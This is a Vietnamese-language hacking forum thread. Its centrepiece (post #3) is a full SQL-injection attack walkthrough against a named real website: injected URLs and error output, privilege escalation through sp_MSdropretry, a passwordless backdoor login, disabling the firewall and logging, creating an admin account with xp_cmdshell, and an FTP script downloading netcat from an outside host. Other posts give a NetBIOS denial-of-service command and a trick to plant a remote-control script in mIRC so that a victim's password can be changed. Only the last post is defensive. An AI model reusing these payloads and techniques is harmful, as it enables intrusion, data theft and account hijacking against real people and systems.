Xin chào ! Nếu đây là lần đầu tiên bạn đến với diễn đàn, xin vui lòng danh ra một phút bấm vào đây để đăng kí và tham gia thảo luận cùng VnPro.

Announcement

Collapse
No announcement yet.

HACKER , HỌ LÀM ĐIỀU ẤY NHƯ THẾ NÀO?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • HACKER , HỌ LÀM ĐIỀU ẤY NHƯ THẾ NÀO?

    Mình có được một bài viết về Hacker , post lên để các bạn tham khảo:


    Khi một Hacker muốn dò tìm cổng mở trên máy tính của nạn nhân, họ sẽ dùng các chương trình Port Scan, các chương trình này sẽ gửi các gói dữ liệu đi khắp một miền IP nào đó, nếu gặp một Active Host thì dữ liệu sẽ được gửi trở lại Hacker và thông báo cho hacker biết địa chỉ IP của người này cũng như các cổng được mở trên máy tính đó. Nhưng nếu máy tính đó được cài các chương trình Firewall như Blackice thì lập tức máy tính đó sẽ được chuyển thành dạng Stealth Mode, có nghĩa là các gói dữ liệu gửi đến sẽ bị chặn lại và Hacker sẽ không biết được sự tồn tại của một Active Host trên IP đó. Do máy tính có tới hàng nghìn cổng khác nhau, cho nên để giảm thời gian tìm kiếm, các Hacker thưòng chỉ dò các cổng như:
    http(80)
    ftp(21)
    telnet(23)
    smtp(25)
    finger(79)
    pop3 (110),...


    Ngoài ra còn một số cổng thường trú của các loại Trojan như BO2K(54320).. và đặc biệt là cổng Netbios(139): cổng này cho phép truy cập dữ liệu của máy tính , tuy nhiên cổng này chỉ mở khi máy tính đặt ở chế độ Share Files.Thông thường thì tất cả các cổng đều đóng trừ cổng Http luôn mở khi bạn truy cập Internet, tuy nhiên có thể khi chạy các chương trình mạng thì một số cổng sẽ được mở ra và các Hacker sẽ dựa vào điểm yếu này để làm tràn ngập cổng. Nếu bạn chạy các chương trình Firewall, đôi khi các bạn cũng nhận được một số thông báo như vậy nhưng không phải tất cả đều là các cuộc tấn công của các Hacker, có thể một Server của một Website mà bạn viếng thăm gần đây, do một lý do nào đó mà bạn đã Disconnect đột ngột và Server này sẽ gửi một 'gói dữ liệu' đến địa chỉ IP của bạn để kiểm tra xem bạn có còn 'tồn tại'hay không, nếu không có trả lời thì Server đó biết là bạn đã Disconnect rồi.

  • #2
    Hì hì, Ông bạn Itworld này có vẻ có đầy bụng lý thuyết quá nhỉ. Thưa bạn, theo ý kiến chủ quan của tôi các Hacker sẽ không tấn công trực diện qua TCP 137,138,139 của bạn đâu. Nếu có dịch vụ này thì dùng LDAP sẽ là giải pháp khả thi hơn nhiều vì nó bỏ qua AUTH và bạn cũng khó Monitor được. Thứ hai 70% các cuộc tấn công thành công từ Internet bắt nguồn từ chính cái port củ chuối 80 của bạn đấy. Sau khi kích hoạt được khả năng execute thì sẽ chuyển sang UDP 69 (thường thì sẽ đổi, vì các firewall hay chặn port này). Sau đó là hạ cái FW của ông bạn xuống và Enjoy. Sau đó là bước xoá logs (Xoá content), và lại UP cái firewall của ông bạn lên như cũ. Thường là về đêm lúc ông bạn đang gáy O o đấy!!!
    Đất ngàn năm còn mãi dáng kiêu sa
    Phường cũ bên danh người đẹp lụa
    Ngõ phố nào in dấu gót hài hoa...

    Comment


    • #3
      XÂM NHẬP MÁY CHỦ MS-SQL QUA LỖI SQL-INJECTION & CROSS-DATABASE

      KĨ THUẬT CONVERT-MAGIC

      Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright © 1988-1998 Microsoft Corporation Standard Edition o­n Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.


      KĨ THUẬT CONVERT-MAGIC

      'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
      • @@servername, db_name(), system_user, ...
      • ‘ “ ( )
      LỖI CROSS-DATABASE CỦA MS-SQL
      use testdatabase
      create proc dbo.test as select * from master.dbo.sysxlogins
      go
      exec test
      select * from master.dbo.sysxlogins
      • sa == dbo
      • db_owner có thể create & design các object của dbo
      • SID của proc dbo.test == SID của master.dbo.sysxlogins


      LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY


      CREATE PROCEDURE sp_MSdropretry
      (@tname sysname, @pname sysname)
      as
      declare @retcode int
      /*
      ** To public
      */
      exec ('drop table ' + @tname)
      if @@ERROR <> 0 return(1)
      exec ('drop procedure ' + @pname)
      if @@ERROR <> 0 return(1)
      return (0)


      NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY

      exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
      exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
      exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
      exec sp_executesql N'drop view dbo.test‘
      drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
      drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
      • guest == db_owner của database master


      PHẦN 2: MINH HỌA HACK SQL

      Khai thác lỗi sql-injection tại nhaxinh.com.vn
      • Một số kinh nghiệm khi hack SQL


      LỖI SQL-INJECTION TẠI NHAXINH.COM.VN


      • dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí




      LỖI SQL-INJECTION TẠI NHAXINH.COM.VN

      Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
      [Microsoft][ODBCSQLServerDriver] [SQLServer]
      Unclosed quotation mark before the character string ''.
      /Including/general.asp, line 840\


      XÁC ĐỊNH VERSION

      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]


      XÁC ĐỊNH VERSION

      [SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition o­n Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
      /Including/general.asp, line 840


      XÁC ĐỊNH SERVER_NAME


      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
      /Including/general.asp, line 840


      XÁC ĐỊNH DATABASE_NAME

      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
      /Including/general.asp, line 840
      XÁC ĐỊNH USER_NAME



      id=1 and 1=convert(int,system_user)--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
      /Including/general.asp, line 840
      • user_name(): các member của “sysadmin” được map sang “dbo”


      XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
      [Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
      /Including/general.asp, line 840
      • admin đã disable openrowset/sqloledb, sẽ enable lại sau


      ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
      • Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell


      XÁC NHẬN GUEST ĐÃ NẰM DB_OWNER CỦA DATABASE MASTER CHƯA ?


      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo')))--
      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int.
      /Including/general.asp, line 840


      CÀI CỬA SAU “BUILTIN\ADMINISTRATORS”


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
      • login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password


      TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN?


      exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
      • Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này


      ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER

      http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1 exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWO RD,0—

      ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER

      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
      Microsoft OLE DB Provider for ODBC Drivers error '80004005'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
      /Including/general.asp, line 840


      DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'—


      DISABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'—


      LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”

      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—


      [COLOR=yellow] LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”


      Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
      /Including/general.asp, line 840


      THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
      • set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins,...) trực tiếp, không qua các “system-procedure”


      CHÚ Ý KHI CHẠY MASTER..XP_CMDSHELL


      • exec master..xp_cmdshell ‘dir c:\’ -- “SQLAgentCmdExec”
      • select * from openrowset('sqloledb', 'server=<SERVER_NAME>;uid=BUILTIN\Administrator s;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "dir c:\"') -- “NT AUTHORITY\SYSTEM”


      XÁC ĐỊNH IP CỦA SERVER


      http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)

      XÁC ĐỊNH IP CỦA SERVER


      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
      /Including/general.asp, line 840


      DO THÁM IP “203.162.7.70”


      C:\> ping 203.162.7.70
      Pinging 203.162.7.70 with 32 bytes of data:
      Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
      C:\> ftp 203.162.7.70
      Connected to 203.162.7.70.
      220 unesco Microsoft FTP Service (Version 5.0).
      User (203.162.7.70:(none)):
      • 203.162.7.70 == panvietnam.com


      FTP TRỰC TIẾP - THẤT BẠI !

      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == “&”)


      FTP TRỰC TIẾP - THẤT BẠI !


      C:\> ftp 203.162.7.70
      Connected to 203.162.7.70.
      220 unesco Microsoft FTP Service
      (Version 5.0).
      User (203.162.7.70:(none)): a
      331 Password required for a.
      Password:
      530 User a cannot log in.
      Login failed.
      ftp> bye


      UPLOAD NETCAT LÊN SERVER

      http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == “>”)


      UPLOAD NETCAT LÊN SERVER


      echo open a.b.c.d >f
      echo user a a >>f
      echo bin >> f
      echo cd a >>f
      echo mget * >>f
      echo quit >>f
      ftp -v -i -n -s:f
      del f

      THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?



      http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
      http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—


      THẨM TRA XEM NETCAT ĐẴ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?

      Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
      /Including/general.asp, line 840


      From HVA :evil:

      Comment


      • #4
        Tấn Công Dos Trong Lan

        CODE
        C:\nbname /astat 192.168.234.222 /conflict
        NBName v1.9 - Decodes and displays NetBIOS Name traffic (UDP 137), with options
        Copyright 2000: Sir Dystic, Cult of the Dead Cow -:|:- New Hack City
        Send complaints, ideas and donations to sd@cultdeadcow.com|sd@newhackcity.net

        WinSock v2.0 (v2.2) WinSock 2.0
        WinSock status: Running
        Bound to port 137 o­n address 192.168.234.244
        Broadcast address 192.168.234.255 Netmask: 255.255.255.0
        **** NBSTAT QUERY packet sent to 192.168.234.222
        Waiting for packets...
        ** Received 301 bytes from 192.168.234.222:137 via local net
        at Web Jun 20 15:46:12 200
        OPCode: QUERY
        Flags: Response AuthoratativeAnswer
        Answer [0]:
        * <00>Node Status Resource Record:
        MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE
        MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE
        **** Name release sent to 192.168.234.222
        ....



        Hậu quả của DoS đối với victim :
        1. Kết nối mạng bị trục trặc
        2. Làm ngưng các chức năng mạng ( vd chức năng Network Neighborhood)
        3. Không dùng được chức năng net send
        4. Gặp trục trặc với kết nối domain
        5. Không thể truy cập được vào tài nguyên chia sẻ chung
        6. Hỏng sevice NetBIOS
        7. Dùng lệnh nbtstat -n sẽ gặp 1 bảng thông báo Conflict như sau :

        CODE
        LAN:
        Node IpAddress: [192.168.234.222] Scope Id: []

        NetBIOS Local Name Table

        Name Type Status
        --------------------------------------------------------------------
        MANDALAY <00> UNIQUE Conflict
        MANDALAYFS <00> GROUP Registered
        MANDALAYFS <1C> GROUP Registered
        MANDALAY <20> UNIQUE Conflict
        MANDALAYFS <1E> GROUP Registered
        MANDALAY <1D> UNIQUE Conflict
        ....

        Bạn có thể tấn công tòan mạng LAN bằng cách thêm các tham số /QUERY , /DENY ...
        Bạn gõ nbname / ? để tham khảo thêm các tham số kèm theo của nbname

        From HVA :evil:

        Comment


        • #5
          Làm gì để hack dùng mIRC ? - Đây nè:

          Cũng như những cách thông dụng của việc lấy pass mail các bạn dùng phần mềm ghi lại pass v.v... o đây mình không nói lại. Mình xin trình bày 1 cách rất là mIRC dùng chính mIRC để làm việc này.

          mIRC có 1 command gọi là ctcp (Client To Client Protocol) nếu trong remote mIRC của 1 nick mà có dòng Script sau : ctcp *:*:?:$1- | halt thì coi như mIRC của nick đó bị điều khiển được ( không chỉ riêng mIRC mà cả cái máy tính ấy cũng sẽ bị điều khiền). Bạn có thể điều khiển người ta những gì ban muốn bằng command: /ctcp Nick /command <= nick cần điều khiển, command ban muốn cho Script của nick đó thực hiên, tuy nhiên chú ý là bạn làm sao cho người ta không cảm thấy bị bạn điều khiển.

          Ví dụ: nếu nick AnhTK dùng mIRC mà trong remote có : ctcp *:*:?:$1- | halt , AnhTraiSG biết được và muốn lấy pass cua nick đó thì AnhTraiSG sẽ gõ những Command sau:

          /ctcp AnhTK /ns set password 11223

          /ctcp AnhTK /clear -s

          /ctcp AnhTK /quit

          Thế là pass nick của AnhTK đổi thành 11223 mà AnhTK không hề hay biết. Câu lệnh cuối làm disconnect AnhTK khỏi server đang chat, khi AnhTK connect trở lại, server sẽ đòi pass nick và chắc chắn AnhTK sẽ không khai báo thành công. Bây giời AnhTraiSG cò thể xài được nick AnhTK với pass là 11223

          Vì mIRC cua nick AnhTK sẽ thực hiện tất cả các command do ctcp send tới nên nếu hiểu biết nhiều về Command cua mIRC các bạn hoàn toàn có thể xoá files trên máy nan nhân, tạo thư mục,...và có thể viết Script vào mIRC cua họ. Tất nhiên không tự nhiên mà trong mIRC Script cua nan nhân có dòng text : ctcp *:*:?:$1- | halt , bạn phải tự Add vào còn không thì lừa họ gõ 2 dòng lệnh sau (gõ vào như chat vậy):

          /writeini getp.ini script n0 ctcp *:*:?:$1- | halt

          /load -rs getp.ini

          thì lập tức trong Remote của mIRC của nick đó sẽ có dòng: ctcp *:*:?:$1- | halt , và bây giờ thì nick đó đang gặp nguy hiểm.

          Vì ctcp *:*:?:$1- | halt nhận tất cả các command của tât cả các nick nên nếu muốn nó chỉ nhận Command cua 1 nick nào đó ( ví dụ: AnhTraiSG) mà thôi thì bạn phải gõ những command sau trước khi thao tác khác:

          /auser hack AnhTraiSG

          /writeini getp.ini script n0 ctcp hack:*:?:$1- | halt

          /load -rs getp.ini

          Chú ý:

          mIRC có thể đã(hiếm khi): /ctcps off , /remote off, hoac /ignore -t , nên các ban cũng cần chú /ctcps on, /remote on và không ignore ctcp...

          Nói về Script mIRC thì quá là nhiều Command, mình chỉ trình bày cái cốt lõi và cơ bản nhất còn lại để hack có hiệu quả thì bạn nên viết ngay 1 Script hack mIRC cho riêng mình, khi nào có nick bị dính ( dễ bị dính lắm_vì chatter rất hiếu động muốn thử xem là cái gì , và người sành sỏi Script mIRC thì không nhiều đâu) thì hãy dùng nó hack làm người dù có hiểu biết cũng chưa kịp trở tay á! :mrgreen:
          From HVA

          Comment


          • #6
            yahoo msn cũng ở 1 file dll hacker cũng có thể gửi script vào victim. You nào thường chat chit có bị dính ẻm nào chưa zậy 8) i'm fear! :evil:

            Comment


            • #7
              1. Tiêm nhiễm HTML (HTML Injection)


              Tiêm nhiễm HTML là một lỗ hổng xảy ra khi ứng dụng web cho phép người dùng đầu vào dữ liệu mà không kiểm soát, cho phép chèn mã HTML tùy ý. Kẻ tấn công có thể lợi dụng để:
              • Hiển thị nội dung giả mạo.
              • Thay đổi cấu trúc giao diện trang web.
              • Trộm cookie phiên và thực hiện các hành vi giả danh người dùng.

              Mặc dù không nguy hiểm bằng XSS, nhưng HTML Injection có thể trở thành điểm khởi đầu cho các cuộc tấn công phức tạp hơn như XSS lưu (Stored XSS) nếu không được xử lý đúng cách. Chúng ta sẽ phân tích kỹ hơn về XSS trong phần sau.
              2. Tiêm nhiễm lệnh (Command Injection)


              Command Injection là một lỗ hổng nghiêm trọng, xảy ra khi đầu vào của người dùng không được xác thực đúng cách và được chèn trực tiếp vào một lệnh hệ điều hành (OS command).

              Khác với Remote Code Execution (RCE) — vốn khai thác lỗi bộ nhớ như tràn bộ đệm — Command Injection chủ yếu khai thác việc gọi shell không an toàn từ các ứng dụng backend. Ví dụ điển hình là khi giá trị đầu vào được chèn trực tiếp vào hàm như system(), exec() trong PHP, Python, v.v.

              Tác hại:
              • Kẻ tấn công có thể thực thi lệnh dưới quyền user chạy ứng dụng.
              • Thao túng tệp, cài mã độc, mở reverse shell.

              Đây là loại tấn công mà mọi ứng dụng web nên kiểm tra kỹ nếu có bất kỳ tương tác nào với hệ điều hành.
              3. Lỗ hổng xác thực và tấn công vét cạn thông tin xác thực


              Xác thực yếu là nguyên nhân dẫn đến phần lớn sự cố an ninh mạng. Có nhiều phương pháp mà kẻ tấn công sử dụng để vượt qua xác thực: Các kỹ thuật phổ biến:
              • Tấn công vét cạn (Credential Brute Force): Thử nhiều tên đăng nhập/mật khẩu để tìm tổ hợp đúng.
                • Vét cạn trực tuyến (Online Brute Force): Tấn công trực tiếp vào ứng dụng, dễ bị phát hiện qua nhật ký hệ thống.
                • Vét cạn ngoại tuyến (Offline Brute Force): Dựa trên tệp băm mật khẩu đã thu được. Khó phát hiện, nhưng yêu cầu tài nguyên tính toán lớn hơn.
              • Sử dụng từ điển: Dựa vào các danh sách mật khẩu phổ biến, ví dụ: wordlists.h4cker.org.
              • Tấn công bảng cầu vồng (Rainbow Table): Sử dụng bảng tra cứu để đảo ngược hàm băm không có salt.
              Phòng chống:
              • Luôn sử dụng mật khẩu mạnh và chính sách khóa tài khoản sau nhiều lần đăng nhập sai.
              • Ưu tiên triển khai xác thực đa yếu tố (MFA).
              • Tránh dùng thuật toán yếu như MD5, SHA1, DES. Thay bằng các giải pháp hiện đại như bcrypt, PBKDF2 hoặc Argon2 (Cisco khuyến nghị).

              4. Cướp phiên (Session Hijacking)


              Cướp phiên cho phép kẻ tấn công chiếm quyền truy cập tài khoản người dùng hợp lệ bằng cách đánh cắp hoặc giả mạo mã phiên (session token). Các kỹ thuật tấn công phổ biến:
              • Dự đoán mã phiên: Nếu mã quá ngắn hoặc không ngẫu nhiên.
              • Sniffing: Thu thập token qua kết nối HTTP không mã hóa.
              • Man-in-the-Middle (MitM): Kẻ tấn công can thiệp vào luồng giao tiếp giữa client và server.
              • Tấn công trong trình duyệt: Lợi dụng extension hoặc script độc để đánh cắp session.

              Mã phiên bị đánh cắp còn có thể bị lợi dụng trong các tấn công khác như XSS, SQL Injection nếu được xử lý không đúng cách trên server.
              5. Thông tin xác thực mặc định


              Không thay đổi mật khẩu mặc định của thiết bị là một sai lầm phổ biến. Các thiết bị mạng như router, switch, firewall thường có tài khoản admin với mật khẩu mặc định được công khai.
              • Các công cụ như Shodan có thể quét internet và liệt kê các thiết bị đang sử dụng cấu hình mặc định.
              • Danh sách mật khẩu phổ biến có thể được tìm thấy tại: defaultpassword.com.

              Lưu ý: Cấu hình ban đầu nên yêu cầu thay đổi mật khẩu mặc định, và chỉ nên cho phép truy cập từ mạng nội bộ hoặc thông qua VPN bảo mật.
              Đặng Quang Minh, CCIEx2#11897 (Enterprise Infrastructure, Wireless), DEVNET, CCSI#31417

              Email : dangquangminh@vnpro.org
              https://www.facebook.com/groups/vietprofessional/

              Comment

              Working...
              X